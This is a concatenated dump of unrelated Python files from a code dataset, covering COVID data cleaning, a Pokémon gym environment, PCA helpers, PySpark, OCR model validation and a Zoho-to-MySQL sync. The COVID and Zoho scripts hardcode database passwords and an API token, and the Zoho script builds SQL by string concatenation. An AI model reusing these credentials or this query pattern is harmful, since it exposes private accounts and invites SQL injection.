'recovered':'int64'})\r\n\r\n #Replacing states codes in india_df with state names\r\n with open('.\\\\data\\\\state_code_dict.pickle', 'rb') as fh:\r\n state_dict = pickle.load(fh)\r\n #state_dict = code_to_dict()\r\n state_dict['tt'] = 'Total'\r\n india_df['state'].replace(to_replace=state_dict,\r\n inplace=True)\r\n\r\n india_df['total_confirmed'] = india_df.groupby('state')['confirmed'].transform(pd.Series.cumsum)\r\n india_df['total_deceased'] = india_df.groupby('state')['deceased'].transform(pd.Series.cumsum)\r\n\r\n\r\n #Defining df containing data of all states of India (Aggregate)\r\n with open(directory+'states_total.json', mode='r') as fp:\r\n dict_in_tot = json.load(fp) \r\n\r\n in_tot_df = pd.DataFrame(dict_in_tot['statewise'])\r\n\r\n #Cleaning and organising in_tot_df\r\n in_tot_df.drop(columns=['deltaconfirmed', 'deltadeaths', 'deltarecovered',\r\n 'migratedother', 'statenotes'],\r\n inplace=True)\r\n\r\n #in_tot_df.columns.tolist()\r\n cols = ['statecode', 'state', 'lastupdatedtime', 'confirmed',\r\n 'active', 'recovered', 'deaths', ] #Reordering columns\r\n in_tot_df = in_tot_df[cols]\r\n\r\n in_tot_df.drop(index=in_tot_df[in_tot_df['state']=='State Unassigned'].index,\r\n inplace=True)\r\n\r\n in_tot_df.reset_index(drop=True, inplace=True)\r\n in_tot_df['lastupdatedtime']= pd.to_datetime(in_tot_df['lastupdatedtime'],\r\n dayfirst=True)\r\n in_tot_df = in_tot_df.astype({'statecode':'string',\r\n 'state':'string',\r\n 'confirmed':'int64',\r\n 'active':'int64',\r\n 'recovered':'int64',\r\n 'deaths':'int64'})\r\n\r\n in_pop_df = pd.read_csv(r'data\\state_pop.csv', index_col=0)\r\n in_pop_df = in_pop_df.astype(dtype={'State or union territory':'string',\r\n 'Population':'int64',\r\n 'Density':'int64'})\r\n \r\n in_tot_df = in_tot_df.merge(in_pop_df, how='inner', left_on='state', 
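# The running totals built below come from a grouped cumulative sum; the
# pandas idiom in isolation:
import pandas as pd

df = pd.DataFrame({'state': ['Kerala', 'Kerala', 'Delhi', 'Delhi'],
                   'confirmed': [1, 2, 3, 4]})
df['total_confirmed'] = df.groupby('state')['confirmed'].transform(pd.Series.cumsum)
# Kerala -> 1, 3 ; Delhi -> 3, 7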
right_on='State or union territory')\r\n in_tot_df = in_tot_df[['statecode', 'state', 'lastupdatedtime', 'confirmed', 'active','recovered',\r\n 'deaths', 'Population', 'Density']]\r\n in_tot_df.rename(columns={'Population':'population',\r\n 'Density':'density'},\r\n inplace=True)\r\n #print(in_tot_df)\r\n\r\n #Writing the cleaned DataFrames(3) to database file\r\n engine = create_engine(f'sqlite:///{directory}data.db', echo=False)\r\n\r\n parent_df.to_sql('global', con=engine, if_exists='replace', index_label='ID')\r\n india_df.to_sql('india_daily', con=engine, if_exists='replace', index_label='ID')\r\n in_tot_df.to_sql('india_total', con=engine, if_exists='replace', index_label='ID')\r\n\r\n mysql_engine = create_engine(\"mysql+mysqlconnector://root:mysqlluv92@localhost/covid19\")\r\n\r\n parent_df.to_sql('global', con=mysql_engine, if_exists='replace', index_label='ID', chunksize=500)\r\n india_df.to_sql('india_daily', con=mysql_engine, if_exists='replace', index_label='ID', chunksize=500)\r\n in_tot_df.to_sql('india_total', con=mysql_engine, if_exists='replace', index_label='ID', chunksize=500)\r\n\r\n status = 'Success'\r\n last_update = now\r\n return status, last_update\r\n\r\nif __name__ == '__main__':\r\n \r\n if download:\r\n print(\"Files downloaded succesfully:\")\r\n\r\n try:\r\n for file in files:\r\n print(file,\r\n datetime.fromtimestamp(os.stat(my_file)[-2]).strftime('%Y-%m-%d %H:%M:%S'))\r\n except FileNotFoundError:\r\n print('Files not found.')\r\n","sub_path":"covid19data.py","file_name":"covid19data.py","file_ext":"py","file_size_in_byte":11556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"593116680","text":"# -*- coding: utf-8 -*-\n\"\"\"This module defines a player class exposing the Open AI Gym API.\n\"\"\"\n\nfrom abc import ABC, abstractmethod, abstractproperty\nfrom gym.core import Env # pyre-ignore\n\nfrom queue import Queue\nfrom threading import Thread\n\nfrom typing import Any, Callable, List, Optional, Tuple\n\nfrom poke_env.environment.battle import Battle\nfrom poke_env.player.player import Player\nfrom poke_env.player_configuration import PlayerConfiguration\nfrom poke_env.server_configuration import ServerConfiguration\nfrom poke_env.utils import to_id_str\n\n\nimport asyncio\nimport numpy as np # pyre-ignore\nimport time\n\n\nclass EnvPlayer(Player, Env, ABC): # pyre-ignore\n \"\"\"Player exposing the Open AI Gym Env API. Recommended use is with play_against.\n \"\"\"\n\n MAX_BATTLE_SWITCH_RETRY = 10000\n PAUSE_BETWEEN_RETRIES = 0.001\n\n def __init__(\n self,\n player_configuration: PlayerConfiguration,\n *,\n avatar: Optional[int] = None,\n battle_format: str,\n log_level: Optional[int] = None,\n server_configuration: ServerConfiguration,\n start_listening: bool = True,\n ):\n \"\"\"\n :param player_configuration: Player configuration.\n :type player_configuration: PlayerConfiguration\n :param avatar: Player avatar id. Optional.\n :type avatar: int, optional\n :param battle_format: Name of the battle format this player plays.\n :type battle_format: str\n :param log_level: The player's logger level.\n :type log_level: int. Defaults to logging's default level.\n :param server_configuration: Server configuration.\n :type server_configuration: ServerConfiguration\n :param start_listening: Wheter to start listening to the server. 
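# The cleaned frames are persisted twice, to SQLite and MySQL, through the
# same to_sql call; reduced to the essentials (table name illustrative):
import pandas as pd
from sqlalchemy import create_engine

engine = create_engine('sqlite:///data/data.db')
pd.DataFrame({'confirmed': [1]}).to_sql('demo', con=engine,
                                        if_exists='replace', index_label='ID')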
Defaults to\n True.\n :type start_listening: bool\n \"\"\"\n super(EnvPlayer, self).__init__(\n player_configuration=player_configuration,\n avatar=avatar,\n battle_format=battle_format,\n log_level=log_level,\n max_concurrent_battles=1,\n server_configuration=server_configuration,\n start_listening=start_listening,\n )\n self._actions = {}\n self._current_battle: Battle\n self._observations = {}\n self._reward_buffer = {}\n self._start_new_battle = False\n\n @abstractmethod\n def _action_to_move(self, action: int, battle: Battle) -> str:\n \"\"\"Abstract method converting elements of the action space to move orders.\n \"\"\"\n pass\n\n def _battle_finished_callback(self, battle: Battle) -> None:\n self._observations[battle].put(self.embed_battle(battle))\n\n def _init_battle(self, battle: Battle) -> None:\n self._observations[battle] = Queue()\n self._actions[battle] = Queue()\n\n def choose_move(self, battle: Battle) -> str:\n if battle not in self._observations or battle not in self._actions:\n self._init_battle(battle)\n self._observations[battle].put(self.embed_battle(battle))\n action = self._actions[battle].get()\n\n return self._action_to_move(action, battle)\n\n def close(self) -> None:\n \"\"\"Unimplemented. Has no effect.\"\"\"\n pass\n\n def complete_current_battle(self) -> None:\n \"\"\"Completes the current battle by performing random moves.\"\"\"\n done = self._current_battle.finished\n while not done:\n _, _, done, _ = self.step(np.random.choice(self._ACTION_SPACE))\n\n def compute_reward(self, battle: Battle) -> float:\n \"\"\"Returns a reward for the given battle.\n\n The default implementation corresponds to the default parameters of the\n reward_computing_helper method.\n\n :param battle: The battle for which to compute the reward.\n :type battle: Battle\n :return: The computed reward.\n :rtype: float\n \"\"\"\n return self.reward_computing_helper(battle)\n\n @abstractmethod\n def embed_battle(self, battle: Battle) -> Any:\n \"\"\"Abstract method for embedding battles.\n\n :param battle: The battle whose state is being embedded\n :type battle: Battle\n :return: The computed embedding\n :rtype: Any\n \"\"\"\n pass\n\n def reset(self) -> Any:\n \"\"\"Resets the internal environment state. The current battle will be set to an\n active unfinished battle.\n\n :return: The observation of the new current battle.\n :rtype: Any\n :raies: EnvironmentError\n \"\"\"\n for _ in range(self.MAX_BATTLE_SWITCH_RETRY):\n battles = dict(self._actions.items())\n battles = [b for b in battles if not b.finished]\n if battles:\n self._current_battle = battles[0]\n observation = self._observations[self._current_battle].get()\n return observation\n time.sleep(self.PAUSE_BETWEEN_RETRIES)\n else:\n raise EnvironmentError(\"User %s has no active battle.\" % self.username)\n\n def render(self, mode=\"human\") -> None:\n \"\"\"A one line rendering of the current state of the battle.\n \"\"\"\n print(\n \" Turn %4d. 
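# EnvPlayer bridges the asynchronous battle loop and the synchronous gym
# API with a pair of queues per battle: choose_move publishes an
# observation and blocks for an action, while step() does the mirror
# image. Stripped to the handshake itself:
from queue import Queue

observations, actions = Queue(), Queue()

def choose_move(embedded_battle):    # called from the battle coroutine
    observations.put(embedded_battle)
    return actions.get()             # blocks until the learner acts

def step(action):                    # called from the learning thread
    actions.put(action)
    return observations.get()        # next observation for the learner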
| [%s][%3d/%3dhp] %10.10s - %10.10s [%3d%%hp][%s]\"\n % (\n self._current_battle.turn,\n \"\".join(\n [\n \"⦻\" if mon.fainted else \"●\"\n for mon in self._current_battle.team.values()\n ]\n ),\n self._current_battle.active_pokemon.current_hp or 0,\n self._current_battle.active_pokemon.max_hp or 0,\n self._current_battle.active_pokemon.species,\n self._current_battle.opponent_active_pokemon.species,\n self._current_battle.opponent_active_pokemon.current_hp or 0,\n \"\".join(\n [\n \"⦻\" if mon.fainted else \"●\"\n for mon in self._current_battle.opponent_team.values()\n ]\n ),\n ),\n end=\"\\n\" if self._current_battle.finished else \"\\r\",\n )\n\n def reward_computing_helper(\n self,\n battle: Battle,\n *,\n fainted_value: float = 0.0,\n hp_value: float = 0.0,\n number_of_pokemons: int = 6,\n starting_value: float = 0.0,\n status_value: float = 0.0,\n victory_value: float = 1.0,\n ) -> float:\n \"\"\"A helper function to compute rewards.\n\n The reward is computed by computing the value of a game state, and by comparing\n it to the last state.\n\n State values are computed by weighting different factor. Fainted pokemons,\n their remaining HP, inflicted statuses and winning are taken into account.\n\n For instance, if the last time this function was called for battle A it had\n a state value of 8 and this call leads to a value of 9, the returned reward will\n be 9 - 8 = 1.\n\n Consider a single battle where each player has 6 pokemons. No opponent pokemon\n has fainted, but our team has one fainted pokemon. Three opposing pokemons are\n burned. We have one pokemon missing half of its HP, and our fainted pokemon has\n no HP left.\n\n The value of this state will be:\n\n - With fainted value: 1, status value: 0.5, hp value: 1:\n = - 1 (fainted) + 3 * 0.5 (status) - 1.5 (our hp) = -1\n - With fainted value: 3, status value: 0, hp value: 1:\n = - 3 + 3 * 0 - 1.5 = -4.5\n\n :param battle: The battle for which to compute rewards.\n :type battle: Battle\n :param fainted_value: The reward weight for fainted pokemons. Defaults to 0.\n :type fainted_value: float\n :param hp_value: The reward weight for hp per pokemon. Defaults to 0.\n :type hp_value: float\n :param number_of_pokemons: The number of pokemons per team. Defaults to 6.\n :type number_of_pokemons: int\n :param starting_value: The default reference value evaluation. Defaults to 0.\n :type starting_value: float\n :param status_value: The reward value per non-fainted status. Defaults to 0.\n :type status_value: float\n :param victory_value: The reward value for winning. 
Defaults to 1.\n :type victory_value: float\n :return: The reward.\n :rtype: float\n \"\"\"\n if battle not in self._reward_buffer:\n self._reward_buffer[battle] = starting_value\n current_value = 0\n\n for mon in battle.team.values():\n current_value += mon.current_hp_fraction * hp_value\n if mon.fainted:\n current_value -= fainted_value\n elif mon.status is not None:\n current_value -= status_value\n\n current_value += (number_of_pokemons - len(battle.team)) * hp_value\n\n for mon in battle.opponent_team.values():\n current_value -= mon.current_hp_fraction * hp_value\n if mon.fainted:\n current_value += fainted_value\n elif mon.status is not None:\n current_value += status_value\n\n current_value -= (number_of_pokemons - len(battle.opponent_team)) * hp_value\n\n if battle.won:\n current_value += victory_value\n elif battle.lost:\n current_value -= victory_value\n\n to_return = current_value - self._reward_buffer[battle]\n self._reward_buffer[battle] = current_value\n\n return to_return\n\n def seed(self, seed=None) -> None:\n \"\"\"Sets the numpy seed.\"\"\"\n np.random.seed(seed)\n\n def step(self, action: int) -> Tuple:\n \"\"\"Performs action in the current battle.\n\n :param action: The action to perform.\n :type action: int\n :return: A tuple containing the next observation, the reward, a boolean\n indicating wheter the episode is finished, and additional information\n :rtype: tuple\n \"\"\"\n self._actions[self._current_battle].put(action)\n observation = self._observations[self._current_battle].get()\n return (\n observation,\n self.compute_reward(self._current_battle),\n self._current_battle.finished,\n {},\n )\n\n def play_against(\n self, env_algorithm: Callable, opponent: Player, env_algorithm_kwargs=None\n ):\n \"\"\"Executes a function controlling the player while facing opponent.\n\n The env_algorithm function is executed with the player environment as first\n argument. It exposes the open ai gym API.\n\n Additional arguments can be passed to the env_algorithm function with\n env_algorithm_kwargs.\n\n Battles against opponent will be launched as long as env_algorithm is running.\n When env_algorithm returns, the current active battle will be finished randomly\n if it is not already.\n\n :param env_algorithm: A function that controls the player. It must accept the\n player as first argument. 
Additional arguments can be passed with the\n env_algorithm_kwargs argument.\n :type env_algorithm: callable\n :param opponent: A player against with the env player will player.\n :type opponent: Player\n :param env_algorithm_kwargs: Optional arguments to pass to the env_algorithm.\n Defaults to None.\n \"\"\"\n self._start_new_battle = True\n\n async def launch_battles(player: EnvPlayer, opponent: Player):\n battles_coroutine = asyncio.gather(\n player.send_challenges(\n opponent=to_id_str(opponent.username),\n n_challenges=1,\n to_wait=opponent.logged_in,\n ),\n opponent.accept_challenges(\n opponent=to_id_str(player.username), n_challenges=1\n ),\n )\n await battles_coroutine\n\n def env_algorithm_wrapper(player, kwargs):\n env_algorithm(player, **kwargs)\n\n player._start_new_battle = False\n while True:\n try:\n player.complete_current_battle()\n player.reset()\n except OSError:\n break\n\n loop = asyncio.get_event_loop()\n\n if env_algorithm_kwargs is None:\n env_algorithm_kwargs = {}\n\n thread = Thread(\n target=lambda: env_algorithm_wrapper(self, env_algorithm_kwargs)\n )\n thread.start()\n\n while self._start_new_battle:\n loop.run_until_complete(launch_battles(self, opponent))\n thread.join()\n\n @abstractproperty\n def action_space(self) -> List:\n \"\"\"Returns the action space of the player. Must be implemented by subclasses.\"\"\"\n pass\n\n\nclass Gen7EnvSinglePlayer(EnvPlayer):\n _ACTION_SPACE = list(range(3 * 4 + 6))\n\n def _action_to_move(self, action: int, battle: Battle) -> str:\n \"\"\"Converts actions to move orders.\n\n The conversion is done as follows:\n\n 0 <= action < 4:\n The actionth available move in battle.available_moves is executed.\n 4 <= action < 8:\n The action - 4th available move in battle.available_moves is executed, with\n z-move.\n 8 <= action < 12:\n The action - 8th available move in battle.available_moves is executed, with\n mega-evolution.\n 12 <= action < 18\n The action - 12th available switch in battle.available_switches is executed.\n\n If the proposed action is illegal, a random legal move is performed.\n\n :param action: The action to convert.\n :type action: int\n :param battle: The battle in which to act.\n :type battle: Battle\n :return: the order to send to the server.\n :rtype: str\n \"\"\"\n if (\n action < 4\n and action < len(battle.available_moves)\n and not battle.force_switch\n ):\n return self.create_order(battle.available_moves[action])\n elif (\n not battle.force_switch\n and battle.can_z_move\n and 0 <= action - 4 < len(battle.active_pokemon.available_z_moves)\n ):\n return self.create_order(\n battle.active_pokemon.available_z_moves[action - 4], z_move=True\n )\n elif (\n battle.can_mega_evolve\n and 0 <= action - 8 < len(battle.available_moves)\n and not battle.force_switch\n ):\n return self.create_order(battle.available_moves[action - 8], mega=True)\n elif 0 <= action - 12 < len(battle.available_switches):\n return self.create_order(battle.available_switches[action - 12])\n else:\n return self.choose_random_move(battle)\n\n @property\n def action_space(self) -> List:\n \"\"\"The action space for gen 7 single battles.\n\n The conversion to moves is done as follows:\n\n 0 <= action < 4:\n The actionth available move in battle.available_moves is executed.\n 4 <= action < 8:\n The action - 4th available move in battle.available_moves is executed,\n with z-move.\n 8 <= action < 12:\n The action - 8th available move in battle.available_moves is executed,\n with mega-evolution.\n 12 <= action < 18\n The action - 12th 
available switch in battle.available_switches is\n executed.\n \"\"\"\n return self._ACTION_SPACE\n","sub_path":"src/poke_env/player/env_player.py","file_name":"env_player.py","file_ext":"py","file_size_in_byte":15621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"401471416","text":"import requests\npath = \"icons/\"\nfile = open('urls.txt','r')\n#https://vignette.wikia.nocookie.net/leagueoflegends/images/6/61/Guardian%27s_Horn_item.png/revision/latest/scale-to-width-down/40\nfor url in file.readlines():\n imageName = url.split('/')[7].replace('%27',\"'\").replace('%21','!').replace('%28','(').replace('%29',')')\n r = requests.get(url)\n with open(path + imageName + \".webp\", \"wb\") as code:\n code.write(r.content)\nprint('end')\n","sub_path":"etc/downloadImages.py","file_name":"downloadImages.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"570343679","text":"from sklearn.decomposition import PCA\nimport pandas as pd\n\ndef prev_cat_count(df, category_col):\n\n df['count'] = 1\n group = df.groupby(category_col).sum()\n group[category_col] = group.index\n\n return df.join(group, on=category_col, rsuffix='_R')['count_R']\n\ndef pca(df, number, name=None, verbose=0):\n\n mod_pca = PCA(number)\n mod_pca.fit(df)\n\n if verbose==1:\n print('>> Explained Variance <<')\n print(mod_pca.explained_variance_)\n print(mod_pca.explained_variance_ratio_)\n\n tran_pca = mod_pca.transform(df)\n\n if name is None:\n name = 'pca'\n\n headers = []\n for i in range(number):\n headers.append('%s_%i' % (name, i))\n\n return pd.DataFrame(tran_pca, columns=headers, index=df.index)\n","sub_path":"depr/0.2.5/dtools/feature.py","file_name":"feature.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"431243289","text":"from pyspark import SparkContext\n\nsc = SparkContext(\"spark://spark-master:7077\", \"PopularItems\")\n\ndata = sc.textFile(\"/tmp/data/inputs/sample.in\", 2) # each worker loads a piece of the data file\n\npairs = data.map(lambda line: line.split(\",\")) # tell each worker to split each line of it's partition\npages = pairs.map(lambda pair: (pair[1], 1)) # re-layout the data to ignore the user id\ncount = pages.reduceByKey(lambda x,y: x+y) # shuffle the data so that each key is only on one worker\n # and then reduce all the values by adding them together\n\noutput = count.collect() # bring the data back to the master node so we can print it out\nfor page_id, count in output:\n print (\"page_id %s count %d\" % (page_id, count))\nprint (\"Popular items done\")\n\nsc.stop()\n","sub_path":"misc/data/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"503000104","text":"limit = 100\n\nresults = 0\ndef step(x, memo={1:1, 89:89}):\n if x == 1:\n return 1\n if x == 89:\n return 89\n else:\n next == sum([int(d)**2 for d in str(x)])\n return step(next)\n\n\nfor i in range(1, limit):\n print (i, step(i))\n\n","sub_path":"Euler_92.py","file_name":"Euler_92.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"445433360","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 26 09:58:32 2018\r\n\r\n@author: 
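# Gen7EnvSinglePlayer carves its flat 18-element action space into fixed
# index blocks; the decode step alone (return tuples illustrative):
def decode_action(action):
    if action < 4:
        return ('move', action)
    if action < 8:
        return ('z-move', action - 4)
    if action < 12:
        return ('mega', action - 8)
    return ('switch', action - 12)   # actions 12..17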
SHRUTINA\r\n\"\"\"\r\n\r\n#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Time : 17-9-25 下午3:56\r\n# @Author : Luo Yao\r\n# @Site : http://github.com/TJCVRS\r\n# @File : validate_shadownet.py\r\n# @IDE: PyCharm Community Edition\r\n\"\"\"\r\nValidate shadow net script\r\n\"\"\"\r\nimport os.path as ops\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport argparse\r\nimport numpy as np\r\nimport math\r\nimport os\r\n#from local_utils import data_utils\r\n#from crnn_model import crnn_model\r\n#from global_configuration import config\r\nimport sys\r\n#sys.path.append('/data2/hdia_ocr_data/CRNN')\r\nsys.path.append(os.getcwd()+'/model/CRNN/crnn_model')\r\nsys.path.append(os.getcwd()+'/model/CRNN/local_utils')\r\nsys.path.append(os.getcwd()+'/model/CRNN/global_configuration')\r\nimport crnn_model\r\nimport data_utils\r\nimport config\r\n\r\n\r\ndef init_args():\r\n \"\"\"\r\n\r\n :return:\r\n \"\"\"\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--filename', type=str, help='Validate filename')\r\n parser.add_argument('--weights_path', type=str, help='Where you store the shadow net weights')\r\n parser.add_argument('--is_recursive', type=bool, help='If need to recursively validate the dataset')\r\n\r\n return parser.parse_args()\r\n\r\n\r\ndef validation_shadownet(filename, weights_path, is_vis=False, is_recursive=True):\r\n \"\"\"\r\n\r\n :param dataset_dir:\r\n :param weights_path:\r\n :param is_vis:\r\n :param is_recursive:\r\n :return:\r\n \"\"\"\r\n # Initialize the record decoder\r\n decoder = data_utils.TextFeatureIO().reader\r\n images_t, labels_t, imagenames_t = decoder.read_features(\r\n os.getcwd()+\"/model/CRNN/data/tfReal/\"+filename, num_epochs=None)\r\n if not is_recursive:\r\n images_sh, labels_sh, imagenames_sh = tf.train.shuffle_batch(tensors=[images_t, labels_t, imagenames_t],\r\n batch_size=32, capacity=1000+32*2,\r\n min_after_dequeue=2, num_threads=4)\r\n else:\r\n images_sh, labels_sh, imagenames_sh = tf.train.batch(tensors=[images_t, labels_t, imagenames_t],\r\n batch_size=32, capacity=1000 + 32 * 2, num_threads=4)\r\n\r\n images_sh = tf.cast(x=images_sh, dtype=tf.float32)\r\n\r\n # build shadownet\r\n net = crnn_model.ShadowNet(phase='Validate', hidden_nums=256, layers_nums=2, seq_length=200, num_classes=148)\r\n\r\n with tf.variable_scope('shadow'):\r\n net_out = net.build_shadownet(inputdata=images_sh)\r\n\r\n decoded, _ = tf.nn.ctc_beam_search_decoder(net_out, 200 * np.ones(32), merge_repeated=False)\r\n\r\n # config tf session\r\n sess_config = tf.ConfigProto()\r\n sess_config.gpu_options.per_process_gpu_memory_fraction = config.cfg.TRAIN.GPU_MEMORY_FRACTION\r\n sess_config.gpu_options.allow_growth = config.cfg.TRAIN.TF_ALLOW_GROWTH\r\n\r\n # config tf saver\r\n saver = tf.train.Saver()\r\n\r\n sess = tf.Session(config=sess_config)\r\n\r\n validate_sample_count = 0\r\n for record in tf.python_io.tf_record_iterator(os.getcwd()+\"/model/CRNN/data/tfReal/\"+filename):\r\n validate_sample_count += 1\r\n loops_nums = int(math.ceil(validate_sample_count / 32))\r\n # loops_nums = 100\r\n\r\n with sess.as_default():\r\n\r\n # restore the model weights\r\n saver.restore(sess=sess, save_path=weights_path)\r\n\r\n coord = tf.train.Coordinator()\r\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\r\n\r\n print('Start predicting ......')\r\n if not is_recursive:\r\n predictions, images, labels, imagenames = sess.run([decoded, images_sh, labels_sh, imagenames_sh])\r\n imagenames = np.reshape(imagenames, 
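# The validation loop below scores each prediction by per-character
# agreement with the ground-truth label, special-casing empty labels; the
# same logic as a small standalone function:
def char_accuracy(gt_label, pred):
    if not gt_label:
        return 1.0 if not pred else 0.0
    correct = sum(1 for i, c in enumerate(gt_label)
                  if i < len(pred) and pred[i] == c)
    return correct / len(gt_label)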
newshape=imagenames.shape[0])\r\n imagenames = [tmp.decode('utf-8') for tmp in imagenames]\r\n preds_res = decoder.sparse_tensor_to_str(predictions[0])\r\n gt_res = decoder.sparse_tensor_to_str(labels)\r\n\r\n accuracy = []\r\n\r\n for index, gt_label in enumerate(gt_res):\r\n pred = preds_res[index]\r\n totol_count = len(gt_label)\r\n correct_count = 0\r\n try:\r\n for i, tmp in enumerate(gt_label):\r\n if tmp == pred[i]:\r\n correct_count += 1\r\n except IndexError:\r\n continue\r\n finally:\r\n try:\r\n accuracy.append(correct_count / totol_count)\r\n except ZeroDivisionError:\r\n if len(pred) == 0:\r\n accuracy.append(1)\r\n else:\r\n accuracy.append(0)\r\n\r\n accuracy = np.mean(np.array(accuracy).astype(np.float32), axis=0)\r\n print('Mean validate accuracy is {:5f}'.format(accuracy))\r\n\r\n for index, image in enumerate(images):\r\n print('Predict {:s} image with gt label: {:s} **** predict label: {:s}'.format(\r\n imagenames[index], gt_res[index], preds_res[index]))\r\n if is_vis:\r\n plt.imshow(image[:, :, (2, 1, 0)])\r\n plt.show()\r\n else:\r\n accuracy = []\r\n for epoch in range(loops_nums):\r\n predictions, images, labels, imagenames = sess.run([decoded, images_sh, labels_sh, imagenames_sh])\r\n imagenames = np.reshape(imagenames, newshape=imagenames.shape[0])\r\n imagenames = [tmp.decode('utf-8') for tmp in imagenames]\r\n preds_res = decoder.sparse_tensor_to_str(predictions[0])\r\n gt_res = decoder.sparse_tensor_to_str(labels)\r\n\r\n for index, gt_label in enumerate(gt_res):\r\n pred = preds_res[index]\r\n totol_count = len(gt_label)\r\n correct_count = 0\r\n try:\r\n for i, tmp in enumerate(gt_label):\r\n if tmp == pred[i]:\r\n correct_count += 1\r\n except IndexError:\r\n continue\r\n finally:\r\n try:\r\n accuracy.append(correct_count / totol_count)\r\n except ZeroDivisionError:\r\n if len(pred) == 0:\r\n accuracy.append(1)\r\n else:\r\n accuracy.append(0)\r\n\r\n for index, image in enumerate(images):\r\n print('Predict {:s} image with gt label: {:s} **** predict label: {:s}'.format(\r\n imagenames[index], gt_res[index], preds_res[index]))\r\n # if is_vis:\r\n # plt.imshow(image[:, :, (2, 1, 0)])\r\n # plt.show()\r\n\r\n accuracy = np.mean(np.array(accuracy).astype(np.float32), axis=0)\r\n print('Validate accuracy is {:5f}'.format(accuracy))\r\n\r\n coord.request_stop()\r\n coord.join(threads=threads)\r\n\r\n sess.close()\r\n return\r\n\r\n\r\nif __name__ == '__main__':\r\n # init args\r\n args = init_args()\r\n\r\n # validate shadow net\r\n validation_shadownet(args.filename, args.weights_path, args.is_recursive)\r\n","sub_path":"model/CRNN/tools/validate_shadownet.py","file_name":"validate_shadownet.py","file_ext":"py","file_size_in_byte":7428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"569561282","text":"import tensorflow as tf\n\ndef loss_function(real, pred, loss_object):\n mask = tf.math.logical_not(tf.math.equal(real, 0))\n loss_ = loss_object(real, pred)\n\n mask = tf.cast(mask, dtype=loss_.dtype)\n loss_ *= mask\n\n return tf.reduce_mean(loss_)","sub_path":"experimentation/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"133003916","text":"import pymysql\nimport requests\nimport json\nimport time\nimport calendar\n\nt1 = time.localtime(time.time()-86400)\ndate = ''.join([str(int(t1.tm_mday)), '-', calendar.month_abbr[int(t1.tm_mon)], '-', str(t1.tm_year)])\n\nurl = 
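# The Zoho sync script above filters records on yesterday's date rendered
# as d-Mon-YYYY; that piece on its own:
import calendar
import time

t1 = time.localtime(time.time() - 86400)
date = '{}-{}-{}'.format(t1.tm_mday, calendar.month_abbr[t1.tm_mon], t1.tm_year)
# e.g. '14-Mar-2024'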
'https://creator.zoho.com.cn/api/json/xunlian/view/form_XunLianLiang_Report?authtoken=d51ecfa14f98e8f14c91ac894bf8e7d4&scope=creatorapi&criteria=(Added_Time.After(\"' + date + '\"))'\ndata = requests.get(url).text\ndata = data.replace(' ', '').split('=')[1][:-1]\ndata = json.loads(data)['form_XunLianLiang']\n\nurl1 = 'https://creator.zoho.com.cn/api/json/xunlian/view/form_XunLianLiang_Report?authtoken=d51ecfa14f98e8f14c91ac894bf8e7d4&scope=creatorapi&criteria=(Modified_Time.After(\"' + date + '\"))'\ndata1 = requests.get(url1).text\ndata1 = data1.replace(' ', '').split('=')[1][:-1]\ndata1 = json.loads(data1)['form_XunLianLiang']\n\n# records added in the last day plus records modified in the last day\ndata = data + data1\n# print(len(data))\n\n# column order must match the order of the values built below\nfie = ['ID', 'form_YunDongYuan', 'Formula_ZuZhiJiaGou', 'Date_field_XunLianRiQi', 'Dropdown_XunLianKeMu', 'Number_XunLianShiChang']\n\ndb = pymysql.connect('video.hbang.com.cn', 'video', 'P@ssw0rd235', 'video')\ncursor = db.cursor()\nfor i in data:\n    val = [str(i['ID']), str('\"'+str(i['form_YunDongYuan'])+'\"'), str('\"'+str(i['Formula_ZuZhiJiaGou'])+'\"'), str('\"'+str(i['Date_field_XunLianRiQi'])+'\"'),\n           str('\"' + str(i['Dropdown_XunLianKeMu']) + '\"'), str('\"'+str(i['Number_XunLianShiChang'])+'\"')]\n\n    sql = \"replace into form_XunLianLiang(\" + ','.join(fie) + \") \" + \"values(\" + ','.join(val) + \")\"\n    cursor.execute(sql)\n    db.commit()\ndb.close()\n","sub_path":"XunLianLiang_zoho-mysql.py","file_name":"XunLianLiang_zoho-mysql.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"284373981","text":"\r\n\r\n###########################################\r\n#\r\n# plottester\r\n#\r\n# procedural way to generate multiple plots\r\n#\r\n###########################################\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef generate_plot(x, y, partner_name):\r\n\r\n    # plotting the points\r\n    plt.plot(x, y, color='green', linestyle='dashed', linewidth = 3,\r\n         marker='o', markerfacecolor='blue', markersize=12)\r\n\r\n    # setting x and y axis range\r\n    plt.ylim(1,20)\r\n    plt.xlim(1,20)\r\n\r\n    # naming the x axis\r\n    plt.xlabel('x - axis')\r\n    # naming the y axis\r\n    plt.ylabel('y - axis')\r\n\r\n    # giving a title to my graph\r\n    plt.title(partner_name)\r\n\r\n    # function to show the plot\r\n    plt.show()\r\n\r\n\r\ndef main():\r\n\r\n    print(\"Starting plottester routine\")\r\n\r\n    # x axis values\r\n    x = [1,2,3,4,5,6]\r\n    # corresponding y axis values\r\n    y = [2,4,1,5,2,6]\r\n\r\n    partner_name = 'Infocon'\r\n\r\n    generate_plot(x, y, partner_name)\r\n\r\n\r\n    # x axis 